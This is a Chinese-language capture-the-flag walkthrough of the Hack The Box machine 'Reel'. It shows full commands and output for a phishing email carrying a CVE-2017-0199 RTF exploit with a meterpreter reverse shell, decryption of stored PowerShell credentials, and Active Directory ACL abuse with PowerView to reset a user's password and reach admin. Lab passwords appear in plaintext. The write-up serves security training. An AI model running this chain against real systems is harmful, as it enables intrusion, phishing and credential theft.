靶场:Hack The Box
系统:windows
内容:AD基本操作,rtf漏洞,powershell credential相关操作
端口扫描情况如下。
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
...
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
Host script results:
|_clock-skew: mean: -14m24s, deviation: 1s, median: -14m25s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-12-16T09:15:36
|_ start_date: 2024-12-16T09:00:09
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-12-16T09:15:35+00:00
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required根据扫描信息,将HTB.LOCAL和REEL.HTB.LOCAL加入hosts。匿名登录ftp,可以下载到两个docx文件和一个readme。
~/D/r $ftp $IP
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:kali): anonymous
...
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx从其中一个docx文件中可以获得一个邮件地址。
~/D/r $exiftool Windows\ Event\ Forwarding.docx
...
Creator : nico@megabank.com使用telnet登录smtp服务,可以验证邮件地址的正确性。
~/D/r $telnet $IP 25
Trying 10.10.10.77...
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO softyhack
250 Hello.
MAIL FROM: <softyhack@123.com>
250 OK
RCPT TO: <nico@megabank.com>
250 OK
RCPT TO: <softyhack@megabank.com>
550 Unknown userReadme文件说的是靶机会查看rtf文档,这是暗示有rtf相关的漏洞。
~/D/r $cat readme.txt
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here. rtf文档执行恶意代码,网上搜索可以得到https://github.com/bhdresh/CVE-2017-0199。 此功能已经在msf里集成,设置如下。
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
SRVHOST 10.10.16.5 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, pr
ocess, none)
LHOST 10.10.16.5 yes The listen address (an interface may be speci
fied)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
View the full module info with the info, or info -d command.
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/office_word_hta) >
[*] Started reverse TCP handler on 10.10.16.5:4444
[+] msf.rtf stored at /home/kali/.msf4/local/msf.rtf
[*] Using URL: http://10.10.16.5:8080/default.hta
[*] Server started.向靶机发送恶意邮件。
~/D/r $sendEmail -f softyhack@megabank.com -t nico@megabank.com -u "subject" -m "message body" -a ~/.msf4/local/msf.rtf -s $IP -v
Dec 18 04:30:50 mykali sendEmail[113486]: DEBUG => Connecting to 10.10.10.77:25
Dec 18 04:30:50 mykali sendEmail[113486]: DEBUG => My IP address is: 10.10.16.5
Dec 18 04:30:50 mykali sendEmail[113486]: SUCCESS => Received: 220 Mail Service ready
Dec 18 04:30:50 mykali sendEmail[113486]: INFO => Sending: EHLO mykali
Dec 18 04:30:50 mykali sendEmail[113486]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Dec 18 04:30:50 mykali sendEmail[113486]: INFO => Sending: MAIL FROM:<softyhack@megabank.com>
Dec 18 04:30:51 mykali sendEmail[113486]: SUCCESS => Received: 250 OK
Dec 18 04:30:51 mykali sendEmail[113486]: INFO => Sending: RCPT TO:<nico@megabank.com>
Dec 18 04:30:51 mykali sendEmail[113486]: SUCCESS => Received: 250 OK
Dec 18 04:30:51 mykali sendEmail[113486]: INFO => Sending: DATA
Dec 18 04:30:51 mykali sendEmail[113486]: SUCCESS => Received: 354 OK, send.
Dec 18 04:30:51 mykali sendEmail[113486]: INFO => Sending message body
Dec 18 04:30:51 mykali sendEmail[113486]: Setting content-type: text/plain
Dec 18 04:30:51 mykali sendEmail[113486]: DEBUG => Sending the attachment [/home/kali/.msf4/local/msf.rtf]
Dec 18 04:31:03 mykali sendEmail[113486]: SUCCESS => Received: 250 Queued (12.187 seconds)
Dec 18 04:31:03 mykali sendEmail[113486]: Email was sent successfully! From: <softyhack@megabank.com> To: <nico@megabank.com> Subject: [subject] Attachment(s): [msf.rtf] Server: [10.10.10.77:25]不一会就在msf得到反弹连接。
C:\Windows\system32>whoami
whoami
htb\nico
c:\Users>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled在nico的桌面发现user flag和一个xml文件,查看内容
c:\Users\nico>tree . /f
tree . /f
Folder PATH listing
Volume serial number is FFFFFFB5 CEBA:B613
C:\USERS\NICO
Contacts
Desktop
cred.xml
user.txt
...
c:\Users\nico\Desktop>type cred.xml
type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>使用powershell可以查看tom用户的密码。
c:\Users\nico\Desktop>powershell -c "$cred=Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() |Format-List *"
powershell -c "$cred=Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() |Format-List *"
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB经过一番尝试,这个密码可以登录tom的ssh服务。登录后在桌面发现提示。
tom@REEL C:\Users\tom\Desktop\AD Audit>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\tom\Desktop\AD Audit
05/29/2018 08:02 PM <DIR> .
05/29/2018 08:02 PM <DIR> ..
05/29/2018 11:44 PM <DIR> BloodHound
05/29/2018 08:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 4,972,294,144 bytes free
tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.tom的桌面有AD相关的内容,说明要通过AD里面的信息往后进行。
tom@REEL C:\Users\tom\Desktop>.\SharpHound.exe
This program is blocked by group policy. For more information, contact your system admin
istrator.由于用户权限问题,无法执行SharpHound,只能从靶机给出的acls.csv中寻找线索。在PrincipalName中筛选tom,找到一项,表示tom对claire有WriteOwner权限。
| ObjectName | ObjectType | ObjectGuid | PrincipalName | PrincipalType | ActiveDirectoryRights | ACEType | AccessControlType | IsInherited |
|---|---|---|---|---|---|---|---|---|
| claire@HTB.LOCAL | USER | tom@HTB.LOCAL | USER | WriteOwner | AccessAllowed | FALSE |
而claire用户对Backup_Admins组有WriteDacl权限。
| ObjectName | ObjectType | ObjectGuid | PrincipalName | PrincipalType | ActiveDirectoryRights | ACEType | AccessControlType | IsInherited |
|---|---|---|---|---|---|---|---|---|
| Backup_Admins@HTB.LOCAL | GROUP | claire@HTB.LOCAL | USER | WriteDacl | AccessAllowed | FALSE |
由于BloodyAD远程修改不行,上传SharpHound.exe或ps1也不能执行,只能用靶机在tom\Desktop里自带的PowerView.ps1。按序执行如下指令。
. .\PowerView.ps1
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
$pass = ConvertTo-SecureString 'P@ssw0rd_' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $pass -Verbose最后一步成功的话,会显示如下。
PS C:\users\tom\desktop\AD Audit\BloodHound> Set-DomainUserPassword -Identity claire -
AccountPassword $pass -Verbose
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'claire'
VERBOSE: [Set-DomainUserPassword] Password for user 'claire' successfully reset现在可以以claire用新的密码登录ssh。接下来的操作速度要快,因为机器好像每隔一小段时间就会复位,claire的密码就会被改回。最后在Administrator\Desktop的一个文件里找到了密码。
~/D/r $ssh claire@$IP
claire@REEL C:\Users\Administrator\Desktop> net group Backup_Admins claire /add /domain
The command completed successfully.
claire@REEL C:\Users\Administrator\Desktop>cd "Backup Scripts"
claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\Administrator\Desktop\Backup Scripts
11/02/2017 09:47 PM <DIR> .
11/02/2017 09:47 PM <DIR> ..
11/03/2017 11:22 PM 845 backup.ps1
11/02/2017 09:37 PM 462 backup1.ps1
11/03/2017 11:21 PM 5,642 BackupScript.ps1
11/02/2017 09:43 PM 2,791 BackupScript.zip
11/03/2017 11:22 PM 1,855 folders-system-state.txt
11/03/2017 11:22 PM 308 test2.ps1.txt
6 File(s) 11,903 bytes
2 Dir(s) 4,970,246,144 bytes free
claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>powershell
Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator\Desktop\Backup Scripts> type * | findstr 'password'
# admin password
$password="Cr4ckMeIfYouC4n!"